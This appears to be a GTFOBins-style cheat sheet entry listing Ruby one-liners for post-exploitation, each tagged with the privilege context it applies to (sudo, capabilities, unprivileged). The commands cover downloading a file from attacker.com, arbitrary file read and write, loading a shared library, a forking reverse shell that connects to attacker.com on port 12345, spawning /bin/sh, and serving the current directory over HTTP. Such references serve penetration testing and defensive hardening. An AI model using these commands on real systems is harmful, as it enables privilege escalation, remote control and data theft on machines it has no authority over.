ruby
Download
Context: sudo, unprivileged
ruby -e 'require "open-uri"; download = URI.open("http://attacker.com/path/to/input-file"); IO.copy_stream(download, "/path/to/output-file")'File Read
Context: sudo, unprivileged
ruby -e 'puts File.read("/path/to/input-file")'File Write
Context: sudo, unprivileged
ruby -e 'File.open("/path/to/output-file", "w+") { |f| f.write("DATA") }'Library Load
Context: sudo, unprivileged
ruby -e 'require "fiddle"; Fiddle.dlopen("/path/to/lib.so")'Reverse Shell
Context: sudo, unprivileged
ruby -rsocket -e 'exit if fork;c=TCPSocket.new("attacker.com",12345);while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'Shell
Context: capabilities, sudo, unprivileged
ruby -e 'exec "/bin/sh"'Upload
Context: sudo, unprivileged
ruby -run -e httpd . -p 80